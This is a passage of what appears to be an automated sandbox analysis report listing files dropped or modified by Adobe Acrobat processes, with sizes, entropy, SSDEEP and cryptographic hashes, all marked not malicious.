SHA-256: | 621B3D694D9F63D9FC19470B40D9B28EEE5CB4F7428C68806811F3377ED89099 |
SHA-512: | 82A490AC1E1FF60ED58691D765F094C3CD106F43D48352586D492A593786C32CE05BDF63F91079E5A9296EA62822F6401582EBB16345BD608217B1DD3FCC937F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.18526161576718 |
Encrypted: | false |
SSDEEP: | 6:iO4mdq2PFi2nKuAl9OmbnIFUtSZXZmwsZFkwOFi2nKuAl9OmbjLJ:7VdvdZHAahFUtE/i5wZHAaSJ |
MD5: | CD184041244FABCDFD76F0EDF03ACD7E |
SHA1: | 47F87B655EE1D64B370A8BF343EE045C02C52E56 |
SHA-256: | 30910E14B30D5C202A9FF733E77B9A716B66005ABDFDBD4963C16198666FCABA |
SHA-512: | B1B2710EE45984DFD359937189764FAB928A71FEE11C4094429029AD503786EF06E650E86E06928D6257BF465E1E38E677655333604D48CA9D1FD32C41855CCD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.18526161576718 |
Encrypted: | false |
SSDEEP: | 6:iO4mdq2PFi2nKuAl9OmbnIFUtSZXZmwsZFkwOFi2nKuAl9OmbjLJ:7VdvdZHAahFUtE/i5wZHAaSJ |
MD5: | CD184041244FABCDFD76F0EDF03ACD7E |
SHA1: | 47F87B655EE1D64B370A8BF343EE045C02C52E56 |
SHA-256: | 30910E14B30D5C202A9FF733E77B9A716B66005ABDFDBD4963C16198666FCABA |
SHA-512: | B1B2710EE45984DFD359937189764FAB928A71FEE11C4094429029AD503786EF06E650E86E06928D6257BF465E1E38E677655333604D48CA9D1FD32C41855CCD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 331 |
Entropy (8bit): | 5.221557830090652 |
Encrypted: | false |
SSDEEP: | 6:iO4rw+q2PFi2nKuAl9Ombzo2jMGIFUtScGD5ZmwsIVkwOFi2nKuAl9Ombzo2jMmd:7QvdZHAa8uFUtVGN/75wZHAa8RJ |
MD5: | 31C0B24A76A9358844D3EA2F69065FA3 |
SHA1: | 2498D621061765F58B1E8BC323B50B803EA1EBBE |
SHA-256: | 604B0986E2746CB0A664AEC9F5092BD39E8C2A0B4134ABB9E4B5FD71494ABC1D |
SHA-512: | 5BB51962AAE83493AC3FDEA97E40AE69C5D82D90DC4235FB624F6AC03FFFD6740752EC3E19F976965256065CAA1D565EF1464F912AE84B5A8E5691DEA9C95A68 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 331 |
Entropy (8bit): | 5.221557830090652 |
Encrypted: | false |
SSDEEP: | 6:iO4rw+q2PFi2nKuAl9Ombzo2jMGIFUtScGD5ZmwsIVkwOFi2nKuAl9Ombzo2jMmd:7QvdZHAa8uFUtVGN/75wZHAa8RJ |
MD5: | 31C0B24A76A9358844D3EA2F69065FA3 |
SHA1: | 2498D621061765F58B1E8BC323B50B803EA1EBBE |
SHA-256: | 604B0986E2746CB0A664AEC9F5092BD39E8C2A0B4134ABB9E4B5FD71494ABC1D |
SHA-512: | 5BB51962AAE83493AC3FDEA97E40AE69C5D82D90DC4235FB624F6AC03FFFD6740752EC3E19F976965256065CAA1D565EF1464F912AE84B5A8E5691DEA9C95A68 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 476 |
Entropy (8bit): | 4.9509108148170435 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqJSsBdOg2Hagcaq3QYiubpP7E4T3y:Y2sRdskdMHS3QYhbd7nby |
MD5: | DAD326B4E6D933BFF1C96F0FA8FBBB59 |
SHA1: | 666889280EB4B97BF8102C0F9A02BECDBE121F94 |
SHA-256: | 3ECC8FF46C61B0860F97F157C65791628AF312D62B0CB750EC9C34AF7C48071B |
SHA-512: | 79B1E8E25EEAE13262D0FB82750A20689847E3E59196A0540F912CBC4D08C74F00A1D64969957BA4D4CD9DA22494C62E52771F289FBF53E3BBF59E5CF1C3CE1A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a5e8c60f-09e0-4aa7-8971-7655ab7024be.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 476 |
Entropy (8bit): | 4.9509108148170435 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqJSsBdOg2Hagcaq3QYiubpP7E4T3y:Y2sRdskdMHS3QYhbd7nby |
MD5: | DAD326B4E6D933BFF1C96F0FA8FBBB59 |
SHA1: | 666889280EB4B97BF8102C0F9A02BECDBE121F94 |
SHA-256: | 3ECC8FF46C61B0860F97F157C65791628AF312D62B0CB750EC9C34AF7C48071B |
SHA-512: | 79B1E8E25EEAE13262D0FB82750A20689847E3E59196A0540F912CBC4D08C74F00A1D64969957BA4D4CD9DA22494C62E52771F289FBF53E3BBF59E5CF1C3CE1A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.23053083219433 |
Encrypted: | false |
SSDEEP: | 96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVlMOQvvk:wshFT0h7cZb2EVKZPEANcGIK5EVlz8vk |
MD5: | D0A844C8058E87AA5AF03EF8CB6A1F09 |
SHA1: | C81D5B30E4D40CF4C1745086D785570ADB0CD6CF |
SHA-256: | 78055D5E3458E9A493FA6B7D9D79D5DD82A4B218F792567FB2FC6DE5E50247BC |
SHA-512: | BE831CCC3A9B11CFDCC92A09686529D3B816D6AED4A8917A0D2903A4753A4DE2CE05E6E0F1937E15D29CA1AFC782258CCE16ECB1BC2FEC26F765054EAE46BBC0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 319 |
Entropy (8bit): | 5.149864331267778 |
Encrypted: | false |
SSDEEP: | 6:iO4iVhw+q2PFi2nKuAl9OmbzNMxIFUtSiVkZmwsiV0vwVkwOFi2nKuAl9OmbzNMT:7FHvdZHAa8jFUtXk/p0vo5wZHAa84J |
MD5: | 58AA5B302F1D128A12CB12265F54E7D4 |
SHA1: | 70EC7E12D3A6B4EEEFD687E852D06611F0EB5665 |
SHA-256: | 0F4C59C8063EB504C0290272F160A5ABA33088F242440789EC022E98E5E44E72 |
SHA-512: | FE1FF3DCD6A93774747F1387413F6795B7A98AD138A0C6CAE0D840CD89D43BB263EC297B7EBF3C2653BFF728E17D55A1AC9E220D669B504C348E4978DB1B67FA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 319 |
Entropy (8bit): | 5.149864331267778 |
Encrypted: | false |
SSDEEP: | 6:iO4iVhw+q2PFi2nKuAl9OmbzNMxIFUtSiVkZmwsiV0vwVkwOFi2nKuAl9OmbzNMT:7FHvdZHAa8jFUtXk/p0vo5wZHAa84J |
MD5: | 58AA5B302F1D128A12CB12265F54E7D4 |
SHA1: | 70EC7E12D3A6B4EEEFD687E852D06611F0EB5665 |
SHA-256: | 0F4C59C8063EB504C0290272F160A5ABA33088F242440789EC022E98E5E44E72 |
SHA-512: | FE1FF3DCD6A93774747F1387413F6795B7A98AD138A0C6CAE0D840CD89D43BB263EC297B7EBF3C2653BFF728E17D55A1AC9E220D669B504C348E4978DB1B67FA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438431137689322 |
Encrypted: | false |
SSDEEP: | 384:Seyci5GkiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1ourVgazUpUTTGt |
MD5: | F61B41788D0E1106092A20023BCF7068 |
SHA1: | 3E914075EF1568D25B4CA4F85D828A1A7D2596AD |
SHA-256: | A5F60F06CD8A22B4DE4999EBBB6F64576DC90693477AB142BB18B6DF0313FFDE |
SHA-512: | CE20233B5045BF05550749A5628051437AB42D8582E0C8CB9DE4898C95FD7A6B04D0613570AA4A5F966115D77295D2A7CE9CD1B049D31334CF1B15DAC39ABDC1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.214767403447927 |
Encrypted: | false |
SSDEEP: | 24:7+t/q6wKWRqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9M+:7MyWWRqvmFTIF3XmHjBoGGR+jMz+Lhz |
MD5: | 15AFB16A5721D4375B4BC70EE690940E |
SHA1: | 037638FA65845E6CE57EDF31031761A171BF6755 |
SHA-256: | A172CE06285FBD6B0C170374E4689B4F657F85BAF7E4D18920D33C63C2466B67 |
SHA-512: | BC21113BA395AAB6291B1A930471D77D7D4C0B8BA5F45D0622998ADFE0A63E833CD7ABA6CD2938E6FA94E3DE6B98698C6FCFFFD60B1F002AE6D90096F7987B8C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7170500916396234 |
Encrypted: | false |
SSDEEP: | 3:kkFklh3stfllXlE/HT8klSl/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKheT8sSl/TNMa8RdWBwRd |
MD5: | 803A5F33D07981A96FE30D9CF0DB7CFF |
SHA1: | 04BF108B0768F0F464AF1B7BD9DB76A12AAB2BE7 |
SHA-256: | 465228BB3586050892A14ACCCA6E71100153237DA303C3B0DDBC184E3EF7DB5F |
SHA-512: | 2A12A87D2572980A642004FD529478DB5553020E76974BCF1C63EDA74914D41B9CB7CC695CA1A9F492ED33EE8FADDAFD2A8EC2297121D416EE524925AF36D36D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.208785301938931 |
Encrypted: | false |
SSDEEP: | 6:kKTTFL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:bBiDImsLNkPlE99SNxAhUe/3 |
MD5: | 54B9D1AF8DA758145ADD840979AAA26A |
SHA1: | 1F1AB2B2B1CFCAA3C85B689D6FF47C6E391059AB |
SHA-256: | 220F1295B50502889931E20AD8F9BAB56A0ACBBDC421A8AF639F9603C9155A51 |
SHA-512: | FE0A0C6CDB2B0030461487AAFE360C97F7945BB6391E4CBBB971639F81008BBCACBCC1D870336C5469E73233C9362237E7A3F9B61FCC3F7CF78E4CDE4A5BE273 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3895001142720576 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJM3g98kUwPeUkwRe9:YvXKXqQ7O12UTbdzGMbLUkee9 |
MD5: | E3AED1DDCE032002D4D23E338117B641 |
SHA1: | 8C4D4C4E535DDD4B9565D70054B0014680CEBE18 |
SHA-256: | D1980C5999FCCBFA46C58C93B4699EF39BB4CF863381C6903CC52B2270A8F7AD |
SHA-512: | A0D0E383DA9E0B962F3F72A716305E00B5D7523E3DAB2DC3D46E38E25E14267CA5DD8F159262442469F6173466C515902347D562C2F7046B26656655513BE93A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.32693035973347 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfBoTfXpnrPeUkwRe9:YvXKXqQ7O12UTbdzGWTfXcUkee9 |
MD5: | 0EFD9FECF0F2F12491A83F8308013AE6 |
SHA1: | C44AF318A43722C2B3C0368CB6A58AAC88F8711D |
SHA-256: | 074C160A1E90E807D6E2EDEF1302B237434DAEF6801CCF6756B67B7250B731FF |
SHA-512: | 535B34AE42185D0B211B17CEA48ABB5DD23139A430E70CBAF83FF91108A831569AAAA14D7DD5669D6F56E038F1CD9E8D67E6A81807C7B15AE951A57FB2413D3A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.305925395128545 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfBD2G6UpnrPeUkwRe9:YvXKXqQ7O12UTbdzGR22cUkee9 |
MD5: | 190F92418ECEB8ECBBB40F908E2598B3 |
SHA1: | 65A17CD1A33846C2F4373C9A56007685381FEBF5 |
SHA-256: | ACF6668D1C209D8FF7D81D5A1825C35FAC14A04A11A49C9FF08661D51DD53E26 |
SHA-512: | 4218FF856C9E52DCD882C5C19608FF75738011112792CAA5350A5729CA9CCDF78BA16DBBBEDC5403DBE06AF225EE3267E5611026550ECBB422C4A972381BF9FB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.3646959023348515 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfPmwrPeUkwRe9:YvXKXqQ7O12UTbdzGH56Ukee9 |
MD5: | 6A807B0398908790B969AF55025163CD |
SHA1: | E5C4CF5DFF4A73D8E2510B1CF3EA4357D70D85EC |
SHA-256: | C4F8544053215573F41A189CAF7D39247D480F965D0EB925E43DDB47B7BF07A7 |
SHA-512: | 998AB4F291D0DA76270D8728F7974194B5FF79C8A32204AD56C00AB9D85D488AF4D3ED6D8E2FDD08E7411AAD36E0212A6DEC4A606C8B9B45CBBD805B442F40F4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.689302015408475 |
Encrypted: | false |
SSDEEP: | 24:Yv6XV7O12UXapLgE9cQx8LennAvzBvkn0RCmK8czOCCS7:Yv6zwahgy6SAFv5Ah8cv/7 |
MD5: | EF22C1F867611CDCC92F184029DC4F06 |
SHA1: | 86FD7DA2E2D814178AF5D79F29556467A5A05B02 |
SHA-256: | 13DBACB235EAAB8B12499E6BB3415882E3DE1BAA65A8453B1EFD4698EA262787 |
SHA-512: | 4F71B3998A237D8F7A746B795CB2C9CA07A9174D09944B25ACFA8BE4D4CF597D5CF6FCC0212A92BB3A46A4620E56334785B3248F9C7CA2944A6FD00146DEC996 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.30562628325056 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJf8dPeUkwRe9:YvXKXqQ7O12UTbdzGU8Ukee9 |
MD5: | 3AFB7877421414C52E52C9DE7FCED301 |
SHA1: | 8086380C2EA62C4903CCDFF69428DF78B5927852 |
SHA-256: | 0CCDCDAF36734A1B9BFDDD7E5710A0CC2D54613AA765FB49F3A52D7EAEA6C68D |
SHA-512: | D15975EBA9F34AC0189531D9F8910B7AC0B4812DDAEC98DC8F6477F63E3585FCB51E262DEC44CF851C25B84452ED5C1E88E3584DB3F63530EAF7DBA8C78E0D2D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.307582106880764 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfQ1rPeUkwRe9:YvXKXqQ7O12UTbdzGY16Ukee9 |
MD5: | D06F3C8104BD50DFC21D37E346DB7C48 |
SHA1: | 446DD3CEA2555D51B6318C31CFBF0665CC479D5F |
SHA-256: | 1EC641862E2D2B297F11B928384D4B2B3E9BBF5C8978745CE61D4FA4D27B4C37 |
SHA-512: | 5CBDE4A31C8FB8ECE75BA67CFB814E0D39B2F44BE94CA837E29440147C1EB101F27B7B096F283F6F93985E5906577878731D1F775313F12D05FAA321C5BE453A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.317667035298641 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfFldPeUkwRe9:YvXKXqQ7O12UTbdzGz8Ukee9 |
MD5: | 6D6FC0217A1BF2C298072E15B7C0A0C1 |
SHA1: | 82F519EF84927F3A6626668CDA8F4F63DAE235DC |
SHA-256: | CBC15392FA73FDB56548CA324C580569302E3548A2177157E93AB77823C410F3 |
SHA-512: | 08D1ED38713CE7808444ED51EDD761F49950919E1929D3B60393F08B312B75188BF7616C85BBA8DB35C530D45A6F84139C3622CA100D77498466A55086854033 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.331747735260508 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfzdPeUkwRe9:YvXKXqQ7O12UTbdzGb8Ukee9 |
MD5: | 8FF249447FDF5BDA3F52C9818E8CAADB |
SHA1: | 9680BCB8C1B27623EA756F26E1DA9F2CFEA80954 |
SHA-256: | 6ED9C84C1719D7E40C540B5514E5D905ABA63063219BB9C9DEBD5B8232FCE521 |
SHA-512: | 8FB7BDBAD08E9B6FA45E479516768A17AD2AB4C189B1E9345B7F0C90367C94445311B6E4159C01E32D4B3CD6B64F669C871EF3A2F64113DC4C9FD366E0B267FE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.312042564633565 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJfYdPeUkwRe9:YvXKXqQ7O12UTbdzGg8Ukee9 |
MD5: | BBA708E4527B6365C490A022FE857622 |
SHA1: | 3C50F309E27B945E0FB8527B35AD390D874D5F0B |
SHA-256: | EFF30B62D6A19EF401F9CE9D995A7AFBF534A2EFCFF97B069DA4A05523A7F6F5 |
SHA-512: | EEFC495813759F057BFB7C1137BB70AFFECAA2E8784493A466A131EF6FD5C3B1A9D3E3FF8E0A3DA29073A864355B6EAC06DF1ED8B73E82222650447E45476031 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.2986039453670655 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPSW574Dpn2UXjb24kF0YkcdoAvJf+dPeUkwRe9:YvXKXqQ7O12UTbdzG28Ukee9 |
MD5: | 85B575ADFBC52E07870B8E637E11B70E |
SHA1: | D55B982AC89933CA36B3FD4CCCD664369F747F89 |
SHA-256: | 3770FFAF6A38F42286DC6DF2D117AAF89336DC7EA040E74539FF2CFB94FDBEAD |
SHA-512: | 7AE67C10A8462A7398F359D3789B53B4F38AF9077403F0960821B12286A94267FDE7034D692D88D6ECA6A98AE7B734C1C3DB6E9623B6010FF274DF8736B96F36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.295506895540187 |
Encrypted: | false |
